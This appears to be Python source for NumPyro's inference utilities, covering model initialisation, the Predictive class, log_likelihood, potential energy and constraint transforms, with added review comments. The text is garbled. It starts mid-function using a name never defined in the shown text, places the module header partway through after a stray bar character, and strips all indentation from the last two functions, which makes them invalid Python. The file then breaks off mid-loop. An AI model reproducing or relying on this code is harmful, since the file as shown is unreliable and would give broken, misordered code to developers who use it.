    }

    if has_enumerate_support:
        from numpyro.contrib.funsor import config_enumerate, enum

        if not isinstance(model, enum):
            max_plate_nesting = _guess_max_plate_nesting(model_trace)
            _validate_model(model_trace)
            # reserve one dim to the left of all plates for enumeration
            model = enum(config_enumerate(model), -max_plate_nesting - 1)

    potential_fn, postprocess_fn = get_potential_fn(
        model,
        inv_transforms,
        replay_model=replay_model,
        enum=has_enumerate_support,
        dynamic_args=dynamic_args,
        model_args=model_args,
        model_kwargs=model_kwargs,
    )

    init_strategy = (
        init_strategy if isinstance(init_strategy, partial) else init_strategy()
    )
    if (init_strategy.func is init_to_value) and not replay_model:
        # map user-provided constrained init values to unconstrained space once,
        # so find_valid_initial_params can consume them directly
        init_values = init_strategy.keywords.get("values")
        unconstrained_values = transform_fn(inv_transforms, init_values, invert=True)
        init_strategy = _init_to_unconstrained_value(values=unconstrained_values)
    prototype_params = transform_fn(inv_transforms, constrained_values, invert=True)
    (init_params, pe, grad), is_valid = find_valid_initial_params(
        rng_key,
        # fix plate sizes from the prototype trace while searching
        substitute(
            model,
            data={
                k: site["value"]
                for k, site in model_trace.items()
                if site["type"] in ["plate"]
            },
        ),
        init_strategy=init_strategy,
        enum=has_enumerate_support,
        model_args=model_args,
        model_kwargs=model_kwargs,
        prototype_params=prototype_params,
        forward_mode_differentiation=forward_mode_differentiation,
        validate_grad=validate_grad,
    )

    if not_jax_tracer(is_valid):
        if device_get(~jnp.all(is_valid)):
            # Initialization failed: re-run the model with validation enabled so
            # distribution argument/value warnings surface before raising.
            with numpyro.validation_enabled(), trace() as tr:
                # validate parameters
                substituted_model(*model_args, **model_kwargs)
                # validate values
                for site in tr.values():
                    if site["type"] == "sample":
                        with warnings.catch_warnings(record=True) as ws:
                            site["fn"]._validate_sample(site["value"])
                        if len(ws) > 0:
                            for w in ws:
                                # add site information to the warning message
                                w.message.args = (
                                    "Site {}: {}".format(
                                        site["name"], w.message.args[0]
                                    ),
                                ) + w.message.args[1:]
                                warnings.showwarning(
                                    w.message,
                                    w.category,
                                    w.filename,
                                    w.lineno,
                                    file=w.file,
                                    line=w.line,
                                )
            raise RuntimeError(
                "Cannot find valid initial parameters. Please check your model again."
            )
    return ModelInfo(
        ParamInfo(init_params, pe, grad), potential_fn, postprocess_fn, model_trace
    )
def _predictive(
    rng_key,
    model,
    posterior_samples,
    batch_shape,
    return_sites=None,
    infer_discrete=False,
    parallel=True,
    # BUG FIX: was a mutable default ``{}``; None-sentinel is backward
    # compatible and avoids the shared-default hazard.
    model_args=(),
    model_kwargs=None,
):
    """Internal driver for :class:`Predictive`: runs ``model`` once per
    posterior sample (vectorized over ``batch_shape`` via ``soft_vmap``) and
    collects the requested sites.

    :param rng_key: PRNG key (split per sample when batch size > 1).
    :param model: Python callable containing Pyro primitives.
    :param dict posterior_samples: latent samples to condition on.
    :param tuple batch_shape: leading batch shape of the samples.
    :param return_sites: sites to collect; "" means all non-plate sites,
        None means un-sampled sample sites plus deterministic sites.
    :param bool infer_discrete: sample discrete sites from their posterior
        via funsor enumeration.
    :param bool parallel: run all samples in one vectorized chunk.
    :return: dict mapping site name to batched predictive values.
    """
    model_kwargs = {} if model_kwargs is None else model_kwargs
    # mask out observed-site log probs; we only want forward sampling here
    masked_model = numpyro.handlers.mask(model, mask=False)
    if infer_discrete:
        # inspect the model to get some structure
        rng_key, subkey = random.split(rng_key)
        batch_ndim = len(batch_shape)
        # flatten the batch dims and take one sample as a structural prototype
        prototype_sample = tree_map(
            lambda x: jnp.reshape(x, (-1,) + jnp.shape(x)[batch_ndim:])[0],
            posterior_samples,
        )
        prototype_trace = trace(
            seed(substitute(masked_model, prototype_sample), subkey)
        ).get_trace(*model_args, **model_kwargs)
        first_available_dim = -_guess_max_plate_nesting(prototype_trace) - 1

    def single_prediction(val):
        # one (key, sample-dict) pair -> one predictive draw
        rng_key, samples = val
        if infer_discrete:
            from numpyro.contrib.funsor import config_enumerate
            from numpyro.contrib.funsor.discrete import _sample_posterior

            model_trace = prototype_trace
            temperature = 1
            pred_samples = _sample_posterior(
                config_enumerate(condition(model, samples)),
                first_available_dim,
                temperature,
                rng_key,
                *model_args,
                **model_kwargs,
            )
        else:
            model_trace = trace(
                seed(substitute(masked_model, samples), rng_key)
            ).get_trace(*model_args, **model_kwargs)
            pred_samples = {name: site["value"] for name, site in model_trace.items()}

        if return_sites is not None:
            if return_sites == "":
                # special signal: return every non-plate site
                sites = {
                    k for k, site in model_trace.items() if site["type"] != "plate"
                }
            else:
                sites = return_sites
        else:
            # default: sample sites not conditioned on, plus deterministic sites
            sites = {
                k
                for k, site in model_trace.items()
                if (site["type"] == "sample" and k not in samples)
                or (site["type"] == "deterministic")
            }
        return {name: value for name, value in pred_samples.items() if name in sites}

    num_samples = int(np.prod(batch_shape))
    if num_samples > 1:
        rng_key = random.split(rng_key, num_samples)
    # NOTE(review): the trailing (2,) assumes the legacy uint32 key layout;
    # typed PRNG keys would need a different reshape — confirm jax version.
    rng_key = rng_key.reshape(batch_shape + (2,))
    chunk_size = num_samples if parallel else 1
    return soft_vmap(
        single_prediction, (rng_key, posterior_samples), len(batch_shape), chunk_size
    )
class Predictive(object):
    """
    This class is used to construct predictive distribution. The predictive distribution is obtained
    by running model conditioned on latent samples from `posterior_samples`.

    .. warning::
        The interface for the `Predictive` class is experimental, and
        might change in the future.

    :param model: Python callable containing Pyro primitives.
    :param dict posterior_samples: dictionary of samples from the posterior.
    :param callable guide: optional guide to get posterior samples of sites not present
        in `posterior_samples`.
    :param dict params: dictionary of values for param sites of model/guide.
    :param int num_samples: number of samples
    :param list return_sites: sites to return; by default only sample sites not present
        in `posterior_samples` are returned.
    :param bool infer_discrete: whether or not to sample discrete sites from the
        posterior, conditioned on observations and other latent values in
        ``posterior_samples``. Under the hood, those sites will be marked with
        ``site["infer"]["enumerate"] = "parallel"``. See how `infer_discrete` works at
        the `Pyro enumeration tutorial <https://pyro.ai/examples/enumeration.html>`_.
        Note that this requires ``funsor`` installation.
    :param bool parallel: whether to predict in parallel using JAX vectorized map :func:`jax.vmap`.
        Defaults to False.
    :param batch_ndims: the number of batch dimensions in posterior samples. Some usages:

        + set `batch_ndims=0` to get prediction for 1 single sample

        + set `batch_ndims=1` to get prediction for `posterior_samples`
          with shapes `(num_samples x ...)`

        + set `batch_ndims=2` to get prediction for `posterior_samples`
          with shapes `(num_chains x N x ...)`. Note that if `num_samples`
          argument is not None, its value should be equal to `num_chains x N`.

    :return: dict of samples from the predictive distribution.

    **Example:**

    Given a model::

        def model(X, y=None):
            ...
            return numpyro.sample("obs", likelihood, obs=y)

    you can sample from the prior predictive::

        predictive = Predictive(model, num_samples=1000)
        y_pred = predictive(rng_key, X)["obs"]

    If you also have posterior samples, you can sample from the posterior predictive::

        predictive = Predictive(model, posterior_samples=posterior_samples)
        y_pred = predictive(rng_key, X)["obs"]

    See docstrings for :class:`~numpyro.infer.svi.SVI` and :class:`~numpyro.infer.mcmc.MCMCKernel`
    to see example code of this in context.
    """

    def __init__(
        self,
        model,
        posterior_samples=None,
        *,
        guide=None,
        params=None,
        num_samples=None,
        return_sites=None,
        infer_discrete=False,
        parallel=False,
        batch_ndims=1,
    ):
        if posterior_samples is None and num_samples is None:
            raise ValueError(
                "Either posterior_samples or num_samples must be specified."
            )

        posterior_samples = {} if posterior_samples is None else posterior_samples

        # Validate that every posterior sample shares the same leading batch
        # shape, and infer num_samples from it (warning on mismatch with the
        # user-supplied argument).
        prototype_site = batch_shape = batch_size = None
        for name, sample in posterior_samples.items():
            if batch_shape is not None and sample.shape[:batch_ndims] != batch_shape:
                raise ValueError(
                    f"Batch shapes at site {name} and {prototype_site} "
                    f"should be the same, but got "
                    f"{sample.shape[:batch_ndims]} and {batch_shape}"
                )
            else:
                prototype_site = name
                batch_shape = sample.shape[:batch_ndims]
                batch_size = int(np.prod(batch_shape))
                if (num_samples is not None) and (num_samples != batch_size):
                    warnings.warn(
                        "Sample's batch dimension size {} is different from the "
                        "provided {} num_samples argument. Defaulting to {}.".format(
                            batch_size, num_samples, batch_size
                        ),
                        UserWarning,
                    )
                num_samples = batch_size

        if num_samples is None:
            raise ValueError(
                "No sample sites in posterior samples to infer `num_samples`."
            )

        if batch_shape is None:
            # prior predictive: fabricate a batch shape from num_samples alone
            batch_shape = (1,) * (batch_ndims - 1) + (num_samples,)

        if return_sites is not None:
            assert isinstance(return_sites, (list, tuple, set))

        self.model = model
        self.posterior_samples = {} if posterior_samples is None else posterior_samples
        self.num_samples = num_samples
        self.guide = guide
        self.params = {} if params is None else params
        self.infer_discrete = infer_discrete
        self.return_sites = return_sites
        self.parallel = parallel
        self.batch_ndims = batch_ndims
        self._batch_shape = batch_shape

    def __call__(self, rng_key, *args, **kwargs):
        """
        Returns dict of samples from the predictive distribution. By default, only sample sites not
        contained in `posterior_samples` are returned. This can be modified by changing the
        `return_sites` keyword argument of this :class:`Predictive` instance.

        :param jax.random.PRNGKey rng_key: random key to draw samples.
        :param args: model arguments.
        :param kwargs: model kwargs.
        """
        posterior_samples = self.posterior_samples
        if self.guide is not None:
            # First draw all guide sites, then feed them to the model below.
            rng_key, guide_rng_key = random.split(rng_key)
            # use return_sites='' as a special signal to return all sites
            guide = substitute(self.guide, self.params)
            posterior_samples = _predictive(
                guide_rng_key,
                guide,
                posterior_samples,
                self._batch_shape,
                return_sites="",
                parallel=self.parallel,
                model_args=args,
                model_kwargs=kwargs,
            )
        model = substitute(self.model, self.params)
        return _predictive(
            rng_key,
            model,
            posterior_samples,
            self._batch_shape,
            return_sites=self.return_sites,
            infer_discrete=self.infer_discrete,
            parallel=self.parallel,
            model_args=args,
            model_kwargs=kwargs,
        )
def log_likelihood(
    model, posterior_samples, *args, parallel=False, batch_ndims=1, **kwargs
):
    """
    (EXPERIMENTAL INTERFACE) Returns log likelihood at observation nodes of model,
    given samples of all latent variables.

    :param model: Python callable containing Pyro primitives.
    :param dict posterior_samples: dictionary of samples from the posterior.
    :param args: model arguments.
    :param batch_ndims: the number of batch dimensions in posterior samples. Some usages:

        + set `batch_ndims=0` to get log likelihoods for 1 single sample

        + set `batch_ndims=1` to get log likelihoods for `posterior_samples`
          with shapes `(num_samples x ...)`

        + set `batch_ndims=2` to get log likelihoods for `posterior_samples`
          with shapes `(num_chains x num_samples x ...)`

    :param kwargs: model kwargs.
    :return: dict of log likelihoods at observation sites.
    """

    def single_loglik(samples):
        # condition the model on one set of latent values and score observations
        substituted_model = (
            substitute(model, samples) if isinstance(samples, dict) else model
        )
        model_trace = trace(substituted_model).get_trace(*args, **kwargs)
        site_logliks = {}
        for name, site in model_trace.items():
            if site["type"] == "sample" and site["is_observed"]:
                site_logliks[name] = site["fn"].log_prob(site["value"])
        return site_logliks

    # all posterior samples must agree on the leading batch shape
    prototype_site = batch_shape = None
    for name, sample in posterior_samples.items():
        shape = jnp.shape(sample)[:batch_ndims]
        if batch_shape is not None and shape != batch_shape:
            raise ValueError(
                f"Batch shapes at site {name} and {prototype_site} "
                f"should be the same, but got "
                f"{sample.shape[:batch_ndims]} and {batch_shape}"
            )
        prototype_site, batch_shape = name, shape

    if batch_shape is None:  # posterior_samples is an empty dict
        batch_shape = (1,) * batch_ndims
        posterior_samples = np.zeros(batch_shape)

    batch_size = int(np.prod(batch_shape))
    chunk_size = batch_size if parallel else 1
    return soft_vmap(single_loglik, posterior_samples, len(batch_shape), chunk_size)
@contextmanager
def helpful_support_errors(site, raise_warnings=False):
    """Context manager turning opaque ``NotImplementedError``s from transform
    lookups into actionable errors that name the offending site.

    :param dict site: trace site whose ``fn``'s ``support`` is inspected.
    :param bool raise_warnings: whether to warn about supports (currently
        circular) that continuous inference handles poorly.
    :raises ValueError: for discrete or spherical supports, with a suggestion.
    """
    name = site["name"]
    support = getattr(site["fn"], "support", None)
    if isinstance(support, constraints.independent):
        # unwrap to inspect the underlying base constraint
        support = support.base_constraint

    # Warnings
    if raise_warnings:
        if support is constraints.circular:
            # BUG FIX: the suggestion strings nested double quotes inside a
            # double-quoted f-string -- a SyntaxError before Python 3.12;
            # use single quotes around the site name instead.
            msg = (
                f"Continuous inference poorly handles circular sample site '{name}'. "
                + "Consider using VonMises distribution together with "
                + "a reparameterizer, e.g. "
                + f"numpyro.handlers.reparam(config={{'{name}': CircularReparam()}})."
            )
            warnings.warn(msg, UserWarning)

    # Exceptions
    try:
        yield
    except NotImplementedError as e:
        support_name = repr(support).lower()
        if "integer" in support_name or "boolean" in support_name:
            # TODO: mention enumeration when it is supported in SVI
            raise ValueError(
                f"Continuous inference cannot handle discrete sample site '{name}'."
            )
        if "sphere" in support_name:
            raise ValueError(
                f"Continuous inference cannot handle spherical sample site '{name}'. "
                "Consider using ProjectedNormal distribution together with "
                "a reparameterizer, e.g. "
                f"numpyro.handlers.reparam(config={{'{name}': ProjectedNormalReparam()}})."
            )
        raise e from None
| # Copyright Contributors to the Pyro project.
# SPDX-License-Identifier: Apache-2.0
from collections import namedtuple
from contextlib import contextmanager
from functools import partial
import warnings
import numpy as np
from jax import device_get, jacfwd, lax, random, value_and_grad
from jax.flatten_util import ravel_pytree
import jax.numpy as jnp
from jax.tree_util import tree_map
import numpyro
from numpyro.distributions import constraints
from numpyro.distributions.transforms import biject_to
from numpyro.distributions.util import is_identically_one, sum_rightmost
from numpyro.handlers import condition, replay, seed, substitute, trace
from numpyro.infer.initialization import init_to_uniform, init_to_value
from numpyro.util import not_jax_tracer, soft_vmap, while_loop
# Public API of this module.
__all__ = [
    "find_valid_initial_params",
    "get_potential_fn",
    "log_density",
    "log_likelihood",
    "potential_energy",
    "initialize_model",
    "Predictive",
]

# Everything initialize_model returns: initial-parameter info, the potential
# and postprocess callables, and the prototype model trace.
ModelInfo = namedtuple(
    "ModelInfo", ["param_info", "potential_fn", "postprocess_fn", "model_trace"]
)
# z: unconstrained latent values; potential_energy: value at z; z_grad: its gradient.
ParamInfo = namedtuple("ParamInfo", ["z", "potential_energy", "z_grad"])
def log_density(model, model_args, model_kwargs, params):
    """
    (EXPERIMENTAL INTERFACE) Computes log of joint density for the model given
    latent values ``params``.

    :param model: Python callable containing NumPyro primitives.
    :param tuple model_args: args provided to the model.
    :param dict model_kwargs: kwargs provided to the model.
    :param dict params: dictionary of current parameter values keyed by site
        name.
    :return: log of joint density and a corresponding model trace
    """
    conditioned_model = substitute(model, data=params)
    model_trace = trace(conditioned_model).get_trace(*model_args, **model_kwargs)
    log_joint = jnp.zeros(())
    # Accumulate the (possibly scaled) log probability of every sample site.
    for site in model_trace.values():
        if site["type"] != "sample":
            continue
        fn, value = site["fn"], site["value"]
        intermediates = site["intermediates"]
        if intermediates:
            site_log_prob = fn.log_prob(value, intermediates)
        else:
            site_log_prob = fn.log_prob(value)
        scale = site["scale"]
        if scale is not None and not is_identically_one(scale):
            site_log_prob = scale * site_log_prob
        log_joint = log_joint + jnp.sum(site_log_prob)
    return log_joint, model_trace
class _without_rsample_stop_gradient(numpyro.primitives.Messenger):
    """
    Stop gradient for samples at latent sample sites for which has_rsample=False.
    """

    def postprocess_message(self, msg):
        # Only latent (non-observed) sample sites lacking a reparameterized
        # sampler need their gradient blocked.
        if msg["type"] != "sample":
            return
        if msg["is_observed"] or msg["fn"].has_rsample:
            return
        msg["value"] = lax.stop_gradient(msg["value"])
        # TODO: reconsider this logic
        # here we clear all the cached value so that gradients of log_prob(value) w.r.t.
        # all parameters of the transformed distributions match the behavior of
        # TransformedDistribution(d, transform) in Pyro with transform.cache_size == 0
        msg["intermediates"] = None
def get_importance_trace(model, guide, args, kwargs, params):
    """
    (EXPERIMENTAL) Returns traces from the guide and the model that is run against it.
    The returned traces also store the log probability at each site.

    .. note:: Gradients are blocked at latent sites which do not have reparametrized samplers.
    """
    guide = substitute(guide, data=params)
    with _without_rsample_stop_gradient():
        guide_trace = trace(guide).get_trace(*args, **kwargs)
    model = substitute(replay(model, guide_trace), data=params)
    model_trace = trace(model).get_trace(*args, **kwargs)
    # Annotate every sample site of both traces with its (possibly scaled) log_prob.
    for tr in (guide_trace, model_trace):
        for site in tr.values():
            if site["type"] != "sample" or "log_prob" in site:
                continue
            fn, value = site["fn"], site["value"]
            intermediates = site["intermediates"]
            log_prob = (
                fn.log_prob(value, intermediates)
                if intermediates
                else fn.log_prob(value)
            )
            scale = site["scale"]
            if scale is not None and not is_identically_one(scale):
                log_prob = scale * log_prob
            site["log_prob"] = log_prob
    return model_trace, guide_trace
def transform_fn(transforms, params, invert=False):
    """
    (EXPERIMENTAL INTERFACE) Callable that applies a transformation from the `transforms`
    dict to values in the `params` dict and returns the transformed values keyed on
    the same names.

    :param transforms: Dictionary of transforms keyed by names. Names in
        `transforms` and `params` should align.
    :param params: Dictionary of arrays keyed by names.
    :param invert: Whether to apply the inverse of the transforms.
    :return: `dict` of transformed params.
    """
    # When inverting, swap each transform for its inverse up front.
    active = {k: t.inv for k, t in transforms.items()} if invert else transforms
    out = {}
    for name, value in params.items():
        # Entries without a registered transform pass through unchanged.
        out[name] = active[name](value) if name in active else value
    return out
def constrain_fn(model, model_args, model_kwargs, params, return_deterministic=False):
    """
    (EXPERIMENTAL INTERFACE) Gets value at each latent site in `model` given
    unconstrained parameters `params`. The `transforms` is used to transform these
    unconstrained parameters to base values of the corresponding priors in `model`.
    If a prior is a transformed distribution, the corresponding base value lies in
    the support of base distribution. Otherwise, the base value lies in the support
    of the distribution.

    :param model: a callable containing NumPyro primitives.
    :param tuple model_args: args provided to the model.
    :param dict model_kwargs: kwargs provided to the model.
    :param dict params: dictionary of unconstrained values keyed by site
        names.
    :param bool return_deterministic: whether to return the value of `deterministic`
        sites from the model. Defaults to `False`.
    :return: `dict` of transformed params.
    """

    def substitute_fn(site):
        name = site["name"]
        if name not in params:
            # returning None leaves the site untouched
            return None
        if site["type"] != "sample":
            return params[name]
        # map the unconstrained value into the distribution's support
        with helpful_support_errors(site):
            return biject_to(site["fn"].support)(params[name])

    substituted_model = substitute(model, substitute_fn=substitute_fn)
    model_trace = trace(substituted_model).get_trace(*model_args, **model_kwargs)
    constrained = {}
    for name, site in model_trace.items():
        if name in params or (
            return_deterministic and site["type"] == "deterministic"
        ):
            constrained[name] = site["value"]
    return constrained
def _unconstrain_reparam(params, site):
    # Substitute-fn used by `potential_energy`: maps the unconstrained value in
    # `params` for this site into the distribution's support and records the
    # log-Jacobian correction via a `numpyro.factor` site. Returns None
    # (i.e. no substitution) for sites not present in `params`.
    name = site["name"]
    if name in params:
        p = params[name]
        support = site["fn"].support
        with helpful_support_errors(site):
            t = biject_to(support)
        # in scan, we might only want to substitute an item at index i, rather than the whole sequence
        i = site["infer"].get("_scan_current_index", None)
        if i is not None:
            # event_dim_shift accounts for transforms that change event rank
            # (e.g. simplex bijections), so the expected unconstrained rank can
            # differ from the constrained sample's rank.
            event_dim_shift = t.codomain.event_dim - t.domain.event_dim
            expected_unconstrained_dim = len(site["fn"].shape()) - event_dim_shift
            # check if p has additional time dimension
            if jnp.ndim(p) > expected_unconstrained_dim:
                p = p[i]
        if support in [constraints.real, constraints.real_vector]:
            # identity transform: no Jacobian factor needed
            return p
        value = t(p)
        log_det = t.log_abs_det_jacobian(p, value)
        # collapse the Jacobian over event dimensions so it broadcasts with the
        # site's batch shape
        log_det = sum_rightmost(
            log_det, jnp.ndim(log_det) - jnp.ndim(value) + len(site["fn"].event_shape)
        )
        if site["scale"] is not None:
            log_det = site["scale"] * log_det
        numpyro.factor("_{}_log_det".format(name), log_det)
        return value
def potential_energy(model, model_args, model_kwargs, params, enum=False):
    """
    (EXPERIMENTAL INTERFACE) Computes potential energy of a model given unconstrained params.
    Under the hood, we will transform these unconstrained parameters to the values
    belong to the supports of the corresponding priors in `model`.

    :param model: a callable containing NumPyro primitives.
    :param tuple model_args: args provided to the model.
    :param dict model_kwargs: kwargs provided to the model.
    :param dict params: unconstrained parameters of `model`.
    :param bool enum: whether to enumerate over discrete latent sites.
    :return: potential energy given unconstrained parameters.
    """
    # Pick the enumeration-aware log density when requested.
    if enum:
        from numpyro.contrib.funsor import log_density as compute_log_density
    else:
        compute_log_density = log_density
    substituted_model = substitute(
        model, substitute_fn=partial(_unconstrain_reparam, params)
    )
    # no param is needed for log_density computation because we already substitute
    log_joint, _ = compute_log_density(substituted_model, model_args, model_kwargs, {})
    return -log_joint
def _init_to_unconstrained_value(site=None, values={}):
    # Sentinel init strategy used internally by `initialize_model`: it carries
    # pre-computed *unconstrained* values in its `values` keyword, which
    # `find_valid_initial_params` reads via `init_strategy.keywords`.
    # NOTE(review): the mutable default `values={}` is only ever read here, never
    # mutated, so it is safe; a None sentinel would be more conventional.
    if site is None:
        # Called without a site (factory form): return a tagged partial, like
        # the public init_to_* strategies do.
        return partial(_init_to_unconstrained_value, values=values)
    # For an actual site this falls through and returns None; presumably the
    # substitute handler treats None as "sample from the prior", and the stored
    # unconstrained values are injected later in `find_valid_initial_params`
    # — TODO confirm against the substitute handler.
def find_valid_initial_params(
    rng_key,
    model,
    *,
    init_strategy=init_to_uniform,
    enum=False,
    model_args=(),
    model_kwargs=None,
    prototype_params=None,
    forward_mode_differentiation=False,
    validate_grad=True,
):
    """
    (EXPERIMENTAL INTERFACE) Given a model with Pyro primitives, returns an initial
    valid unconstrained value for all the parameters. This function also returns
    the corresponding potential energy, the gradients, and an
    `is_valid` flag to say whether the initial parameters are valid. Parameter values
    are considered valid if the values and the gradients for the log density have
    finite values.

    :param jax.random.PRNGKey rng_key: random number generator seed to
        sample from the prior. The returned `init_params` will have the
        batch shape ``rng_key.shape[:-1]``.
    :param model: Python callable containing Pyro primitives.
    :param callable init_strategy: a per-site initialization function.
    :param bool enum: whether to enumerate over discrete latent sites.
    :param tuple model_args: args provided to the model.
    :param dict model_kwargs: kwargs provided to the model.
    :param dict prototype_params: an optional prototype parameters, which is used
        to define the shape for initial parameters.
    :param bool forward_mode_differentiation: whether to use forward-mode differentiation
        or reverse-mode differentiation. Defaults to False.
    :param bool validate_grad: whether to validate gradient of the initial params.
        Defaults to True.
    :return: tuple of `init_params_info` and `is_valid`, where `init_params_info` is the tuple
        containing the initial params, their potential energy, and their gradients.
    """
    model_kwargs = {} if model_kwargs is None else model_kwargs
    # Normalize `init_strategy` to a functools.partial so `.func` / `.keywords`
    # can be inspected below.
    init_strategy = (
        init_strategy if isinstance(init_strategy, partial) else init_strategy()
    )
    # handle those init strategies differently to save computation
    if init_strategy.func is init_to_uniform:
        radius = init_strategy.keywords.get("radius")
        init_values = {}
    elif init_strategy.func is _init_to_unconstrained_value:
        radius = 2
        init_values = init_strategy.keywords.get("values")
    else:
        # arbitrary strategy: must trace the model in body_fn (radius is None)
        radius = None

    def cond_fn(state):
        # Keep retrying (at most 100 attempts) until params with finite
        # energy/gradients are found.
        i, _, _, is_valid = state
        return (i < 100) & (~is_valid)

    def body_fn(state):
        i, key, _, _ = state
        key, subkey = random.split(key)

        if radius is None or prototype_params is None:
            # XXX: we don't want to apply enum to draw latent samples
            model_ = model
            if enum:
                from numpyro.contrib.funsor import enum as enum_handler

                if isinstance(model, substitute) and isinstance(
                    model.fn, enum_handler
                ):
                    model_ = substitute(model.fn.fn, data=model.data)
                elif isinstance(model, enum_handler):
                    model_ = model.fn

            # Wrap model in a `substitute` handler to initialize from `init_loc_fn`.
            seeded_model = substitute(seed(model_, subkey), substitute_fn=init_strategy)
            model_trace = trace(seeded_model).get_trace(*model_args, **model_kwargs)
            constrained_values, inv_transforms = {}, {}
            for k, v in model_trace.items():
                if (
                    v["type"] == "sample"
                    and not v["is_observed"]
                    and not v["fn"].is_discrete
                ):
                    constrained_values[k] = v["value"]
                    with helpful_support_errors(v):
                        inv_transforms[k] = biject_to(v["fn"].support)
            # Map the constrained draws back to unconstrained space.
            # NOTE(review): the inner dict comprehension is just a shallow copy
            # of `constrained_values`.
            params = transform_fn(
                inv_transforms,
                {k: v for k, v in constrained_values.items()},
                invert=True,
            )
        else:  # this branch doesn't require tracing the model
            params = {}
            for k, v in prototype_params.items():
                if k in init_values:
                    params[k] = init_values[k]
                else:
                    params[k] = random.uniform(
                        subkey, jnp.shape(v), minval=-radius, maxval=radius
                    )
                    # fresh subkey per sampled parameter
                    key, subkey = random.split(key)

        potential_fn = partial(
            potential_energy, model, model_args, model_kwargs, enum=enum
        )
        if validate_grad:
            if forward_mode_differentiation:
                pe = potential_fn(params)
                z_grad = jacfwd(potential_fn)(params)
            else:
                pe, z_grad = value_and_grad(potential_fn)(params)
            z_grad_flat = ravel_pytree(z_grad)[0]
            # valid only when both energy and every gradient entry are finite
            is_valid = jnp.isfinite(pe) & jnp.all(jnp.isfinite(z_grad_flat))
        else:
            pe = potential_fn(params)
            is_valid = jnp.isfinite(pe)
            z_grad = None

        return i + 1, key, (params, pe, z_grad), is_valid

    def _find_valid_params(rng_key, exit_early=False):
        # state: (attempt counter, rng key, (params, energy, grad), is_valid)
        init_state = (0, rng_key, (prototype_params, 0.0, prototype_params), False)
        if exit_early and not_jax_tracer(rng_key):
            # Early return if valid params found. This is only helpful for single chain,
            # where we can avoid compiling body_fn in while_loop.
            _, _, (init_params, pe, z_grad), is_valid = init_state = body_fn(init_state)
            if not_jax_tracer(is_valid):
                if device_get(is_valid):
                    return (init_params, pe, z_grad), is_valid

        # XXX: this requires compiling the model, so for multi-chain, we trace the model 2-times
        # even if the init_state is a valid result
        _, _, (init_params, pe, z_grad), is_valid = while_loop(
            cond_fn, body_fn, init_state
        )
        return (init_params, pe, z_grad), is_valid

    # Handle possible vectorization
    if rng_key.ndim == 1:
        (init_params, pe, z_grad), is_valid = _find_valid_params(
            rng_key, exit_early=True
        )
    else:
        (init_params, pe, z_grad), is_valid = lax.map(_find_valid_params, rng_key)
    return (init_params, pe, z_grad), is_valid
def _get_model_transforms(model, model_args=(), model_kwargs=None):
    """Trace `model` once and collect, per continuous latent site, the bijection
    onto its support.

    :return: tuple ``(inv_transforms, replay_model, has_enumerate_support,
        model_trace)``; `replay_model` signals the model must be replayed to
        recover deterministic sites or dynamic supports, and
        `has_enumerate_support` signals discrete latent sites are present.
    """
    model_kwargs = {} if model_kwargs is None else model_kwargs
    model_trace = trace(model).get_trace(*model_args, **model_kwargs)
    inv_transforms = {}
    # model code may need to be replayed in the presence of deterministic sites
    replay_model = False
    has_enumerate_support = False
    for name, site in model_trace.items():
        site_type = site["type"]
        if site_type == "deterministic":
            replay_model = True
            continue
        if site_type != "sample" or site["is_observed"]:
            continue
        if site["fn"].is_discrete:
            has_enumerate_support = True
            if not site["fn"].has_enumerate_support:
                raise RuntimeError(
                    "MCMC only supports continuous sites or discrete sites "
                    f"with enumerate support, but got {type(site['fn']).__name__}."
                )
            continue
        support = site["fn"].support
        with helpful_support_errors(site, raise_warnings=True):
            inv_transforms[name] = biject_to(support)
        # XXX: the following code filters out most situations with dynamic supports
        bound_attrs = ()
        if isinstance(support, constraints._GreaterThan):
            bound_attrs = ("lower_bound",)
        elif isinstance(support, constraints._Interval):
            bound_attrs = ("lower_bound", "upper_bound")
        if any(
            not isinstance(getattr(support, attr), (int, float))
            for attr in bound_attrs
        ):
            replay_model = True
    return inv_transforms, replay_model, has_enumerate_support, model_trace
def get_potential_fn(
    model,
    inv_transforms,
    *,
    enum=False,
    replay_model=False,
    dynamic_args=False,
    model_args=(),
    model_kwargs=None,
):
    """
    (EXPERIMENTAL INTERFACE) Given a model with Pyro primitives, returns a
    function which, given unconstrained parameters, evaluates the potential
    energy (negative log joint density). In addition, this returns a
    function to transform unconstrained values at sample sites to constrained
    values within their respective support.

    :param model: Python callable containing Pyro primitives.
    :param dict inv_transforms: dictionary of transforms keyed by names.
    :param bool enum: whether to enumerate over discrete latent sites.
    :param bool replay_model: whether we need to replay model in
        `postprocess_fn` to obtain `deterministic` sites.
    :param bool dynamic_args: if `True`, the `potential_fn` and
        `constraints_fn` are themselves dependent on model arguments.
        When provided a `*model_args, **model_kwargs`, they return
        `potential_fn` and `constraints_fn` callables, respectively.
    :param tuple model_args: args provided to the model.
    :param dict model_kwargs: kwargs provided to the model.
    :return: tuple of (`potential_fn`, `postprocess_fn`). The latter is used
        to constrain unconstrained samples (e.g. those returned by HMC)
        to values that lie within the site's support, and return values at
        `deterministic` sites in the model.
    """
    if dynamic_args:
        # Each returned callable closes over the supplied model arguments and
        # produces the actual potential / postprocess function.
        def potential_fn(*args, **kwargs):
            return partial(potential_energy, model, args, kwargs, enum=enum)

        def postprocess_fn(*args, **kwargs):
            if not replay_model:
                return partial(transform_fn, inv_transforms)
            # XXX: we seed to sample discrete sites (but not collect them)
            model_ = seed(model.fn, 0) if enum else model
            return partial(
                constrain_fn, model_, args, kwargs, return_deterministic=True
            )

        return potential_fn, postprocess_fn

    model_kwargs = {} if model_kwargs is None else model_kwargs
    potential_fn = partial(
        potential_energy, model, model_args, model_kwargs, enum=enum
    )
    if replay_model:
        # XXX: we seed to sample discrete sites (but not collect them)
        model_ = seed(model.fn, 0) if enum else model
        postprocess_fn = partial(
            constrain_fn,
            model_,
            model_args,
            model_kwargs,
            return_deterministic=True,
        )
    else:
        postprocess_fn = partial(transform_fn, inv_transforms)
    return potential_fn, postprocess_fn
def _guess_max_plate_nesting(model_trace):
"""
Guesses max_plate_nesting by using model trace.
This optimistically assumes static model
structure.
"""
sites = [site for site in model_trace.values() if site["type"] == "sample"]
dims = [
frame.dim
for site in sites
for frame in site["cond_indep_stack"]
if frame.dim is not None
]
max_plate_nesting = -min(dims) if dims else 0
return max_plate_nesting
# TODO: follow pyro.util.check_site_shape logics for more complete validation
def _validate_model(model_trace):
# XXX: this validates plate statements under `enum`
sites = [site for site in model_trace.values() if site["type"] == "sample"]
for site in sites:
batch_dims = len(site["fn"].batch_shape)
if site.get("_control_flow_done", False):
batch_dims = batch_dims - 1 # remove time dimension under scan
